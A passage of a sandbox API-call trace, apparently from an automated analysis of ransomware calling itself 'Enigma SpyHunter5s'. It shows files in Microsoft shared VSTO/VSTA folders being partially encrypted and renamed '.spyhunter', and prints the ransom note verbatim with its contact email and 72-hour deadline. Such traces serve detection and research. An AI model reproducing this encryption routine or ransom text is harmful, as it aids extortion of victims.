(lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0177.685] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e4b8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e4b8*=0x2ac, lpOverlapped=0x0) returned 1 [0177.686] CloseHandle (hObject=0xa0) returned 1 [0177.686] GetProcessHeap () returned 0x2c0000 [0177.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9b50 | out: hHeap=0x2c0000) returned 1 [0177.686] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e458 | out: pbBuffer=0x270e458) returned 1 [0177.686] GetProcessHeap () returned 0x2c0000 [0177.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0177.686] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e450*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e450*=0x30) returned 1 [0177.686] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\vstomessageprovider.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0177.687] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll") returned 90 [0177.687] StrStrW (lpFirst="VSTOMessageProvider.dll", lpSrch=".txt") returned 0x0 [0177.687] GetProcessHeap () returned 0x2c0000 [0177.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0177.687] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e414, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e414*=0x2800, lpOverlapped=0x0) returned 1 [0177.692] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0177.692] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e414, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e414*=0x2800, lpOverlapped=0x0) returned 1 [0177.692] GetProcessHeap () returned 0x2c0000 [0177.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0177.692] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.692] WriteFile (in: hFile=0xa0, lpBuffer=0x270e454*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e414, lpOverlapped=0x0 | out: lpBuffer=0x270e454*, lpNumberOfBytesWritten=0x270e414*=0x4, lpOverlapped=0x0) returned 1 [0177.694] WriteFile (in: hFile=0xa0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e414, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e414*=0x30, lpOverlapped=0x0) returned 1 [0177.694] CloseHandle (hObject=0xa0) returned 1 [0177.694] GetProcessHeap () returned 0x2c0000 [0177.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0177.694] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll.spyhunter") returned 100 [0177.694] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\vstomessageprovider.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\vstomessageprovider.dll.spyhunter")) returned 1 [0177.696] GetProcessHeap () returned 0x2c0000 [0177.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0177.696] GetProcessHeap () returned 0x2c0000 [0177.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0177.696] GetProcessHeap () returned 0x2c0000 [0177.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5dec0 | out: hHeap=0x2c0000) returned 1 [0177.696] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e450 | out: pbBuffer=0x270e450) returned 1 [0177.696] GetProcessHeap () returned 0x2c0000 [0177.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0177.696] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e448*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e448*=0x30) returned 1 [0177.703] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\vstoloader.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0177.705] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll") returned 81 [0177.705] StrStrW (lpFirst="VSTOLoader.dll", lpSrch=".txt") returned 0x0 [0177.705] GetProcessHeap () returned 0x2c0000 [0177.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0177.705] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e40c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e40c*=0x2800, lpOverlapped=0x0) returned 1 [0177.719] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0177.720] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e40c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e40c*=0x2800, lpOverlapped=0x0) returned 1 [0177.720] GetProcessHeap () returned 0x2c0000 [0177.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0177.720] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.720] WriteFile (in: hFile=0xa0, lpBuffer=0x270e44c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e40c, lpOverlapped=0x0 | out: lpBuffer=0x270e44c*, lpNumberOfBytesWritten=0x270e40c*=0x4, lpOverlapped=0x0) returned 1 [0177.766] WriteFile (in: hFile=0xa0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e40c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e40c*=0x30, lpOverlapped=0x0) returned 1 [0177.766] CloseHandle (hObject=0xa0) returned 1 [0177.766] GetProcessHeap () returned 0x2c0000 [0177.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0177.766] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll.spyhunter") returned 91 [0177.766] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\vstoloader.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\vstoloader.dll.spyhunter")) returned 1 [0177.767] GetProcessHeap () returned 0x2c0000 [0177.767] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0177.767] GetProcessHeap () returned 0x2c0000 [0177.767] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0177.767] GetProcessHeap () returned 0x2c0000 [0177.767] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9a60 | out: hHeap=0x2c0000) returned 1 [0177.767] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\contracts\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0177.768] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0177.768] WriteFile (in: hFile=0xa0, lpBuffer=0x270e383*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e4ac, lpOverlapped=0x0 | out: lpBuffer=0x270e383*, lpNumberOfBytesWritten=0x270e4ac*=0x127, lpOverlapped=0x0) returned 1 [0177.769] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0177.769] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e4ac, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e4ac*=0x2ac, lpOverlapped=0x0) returned 1 [0177.769] CloseHandle (hObject=0xa0) returned 1 [0177.770] GetProcessHeap () returned 0x2c0000 [0177.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee37e8 | out: hHeap=0x2c0000) returned 1 [0177.770] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e448 | out: pbBuffer=0x270e448) returned 1 [0177.770] GetProcessHeap () returned 0x2c0000 [0177.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0177.770] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e440*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e440*=0x30) returned 1 [0177.770] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Office.Contract.v9.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\contracts\\microsoft.visualstudio.tools.office.contract.v9.0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0177.770] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Office.Contract.v9.0.dll") returned 140 [0177.770] StrStrW (lpFirst="Microsoft.VisualStudio.Tools.Office.Contract.v9.0.dll", lpSrch=".txt") returned 0x0 [0177.771] GetProcessHeap () returned 0x2c0000 [0177.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0177.771] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e404, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270e404*=0x2800, lpOverlapped=0x0) returned 1 [0177.779] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0177.780] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e404, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270e404*=0x2800, lpOverlapped=0x0) returned 1 [0177.780] GetProcessHeap () returned 0x2c0000 [0177.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0177.780] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.780] WriteFile (in: hFile=0xa0, lpBuffer=0x270e444*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e404, lpOverlapped=0x0 | out: lpBuffer=0x270e444*, lpNumberOfBytesWritten=0x270e404*=0x4, lpOverlapped=0x0) returned 1 [0177.780] WriteFile (in: hFile=0xa0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e404, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e404*=0x30, lpOverlapped=0x0) returned 1 [0177.780] CloseHandle (hObject=0xa0) returned 1 [0177.780] GetProcessHeap () returned 0x2c0000 [0177.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0177.780] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Office.Contract.v9.0.dll.spyhunter") returned 150 [0177.781] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Office.Contract.v9.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\contracts\\microsoft.visualstudio.tools.office.contract.v9.0.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Office.Contract.v9.0.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\contracts\\microsoft.visualstudio.tools.office.contract.v9.0.dll.spyhunter")) returned 1 [0177.782] GetProcessHeap () returned 0x2c0000 [0177.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0177.782] GetProcessHeap () returned 0x2c0000 [0177.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0177.782] GetProcessHeap () returned 0x2c0000 [0177.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e92f80 | out: hHeap=0x2c0000) returned 1 [0177.782] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e448 | out: pbBuffer=0x270e448) returned 1 [0177.782] GetProcessHeap () returned 0x2c0000 [0177.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0177.782] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e440*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e440*=0x30) returned 1 [0177.782] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Applications.Contract.v9.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\contracts\\microsoft.visualstudio.tools.applications.contract.v9.0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0177.783] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Applications.Contract.v9.0.dll") returned 146 [0177.783] StrStrW (lpFirst="Microsoft.VisualStudio.Tools.Applications.Contract.v9.0.dll", lpSrch=".txt") returned 0x0 [0177.783] GetProcessHeap () returned 0x2c0000 [0177.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0177.783] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e404, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270e404*=0x2800, lpOverlapped=0x0) returned 1 [0177.823] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0177.824] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e404, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270e404*=0x2800, lpOverlapped=0x0) returned 1 [0177.824] GetProcessHeap () returned 0x2c0000 [0177.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0177.824] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.824] WriteFile (in: hFile=0xa0, lpBuffer=0x270e444*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e404, lpOverlapped=0x0 | out: lpBuffer=0x270e444*, lpNumberOfBytesWritten=0x270e404*=0x4, lpOverlapped=0x0) returned 1 [0177.833] WriteFile (in: hFile=0xa0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e404, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e404*=0x30, lpOverlapped=0x0) returned 1 [0177.834] CloseHandle (hObject=0xa0) returned 1 [0177.834] GetProcessHeap () returned 0x2c0000 [0177.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0177.834] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Applications.Contract.v9.0.dll.spyhunter") returned 156 [0177.834] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Applications.Contract.v9.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\contracts\\microsoft.visualstudio.tools.applications.contract.v9.0.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\Contracts\\Microsoft.VisualStudio.Tools.Applications.Contract.v9.0.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\contracts\\microsoft.visualstudio.tools.applications.contract.v9.0.dll.spyhunter")) returned 1 [0177.835] GetProcessHeap () returned 0x2c0000 [0177.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0177.835] GetProcessHeap () returned 0x2c0000 [0177.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0177.835] GetProcessHeap () returned 0x2c0000 [0177.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0a010 | out: hHeap=0x2c0000) returned 1 [0177.835] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e440 | out: pbBuffer=0x270e440) returned 1 [0177.835] GetProcessHeap () returned 0x2c0000 [0177.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0177.836] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e438*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e438*=0x30) returned 1 [0177.836] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\Microsoft.VisualStudio.Tools.Applications.Runtime.v10.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinviews\\microsoft.visualstudio.tools.applications.runtime.v10.0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0177.837] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\Microsoft.VisualStudio.Tools.Applications.Runtime.v10.0.dll") returned 147 [0177.837] StrStrW (lpFirst="Microsoft.VisualStudio.Tools.Applications.Runtime.v10.0.dll", lpSrch=".txt") returned 0x0 [0177.837] GetProcessHeap () returned 0x2c0000 [0177.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0177.837] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e3fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270e3fc*=0x2800, lpOverlapped=0x0) returned 1 [0177.883] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0177.883] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e3fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270e3fc*=0x2800, lpOverlapped=0x0) returned 1 [0177.883] GetProcessHeap () returned 0x2c0000 [0177.883] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0177.883] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.883] WriteFile (in: hFile=0xa0, lpBuffer=0x270e43c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e3fc, lpOverlapped=0x0 | out: lpBuffer=0x270e43c*, lpNumberOfBytesWritten=0x270e3fc*=0x4, lpOverlapped=0x0) returned 1 [0178.118] WriteFile (in: hFile=0xa0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e3fc, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e3fc*=0x30, lpOverlapped=0x0) returned 1 [0178.118] CloseHandle (hObject=0xa0) returned 1 [0178.118] GetProcessHeap () returned 0x2c0000 [0178.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0178.118] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\Microsoft.VisualStudio.Tools.Applications.Runtime.v10.0.dll.spyhunter") returned 157 [0178.118] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\Microsoft.VisualStudio.Tools.Applications.Runtime.v10.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinviews\\microsoft.visualstudio.tools.applications.runtime.v10.0.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInViews\\Microsoft.VisualStudio.Tools.Applications.Runtime.v10.0.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinviews\\microsoft.visualstudio.tools.applications.runtime.v10.0.dll.spyhunter")) returned 1 [0178.119] GetProcessHeap 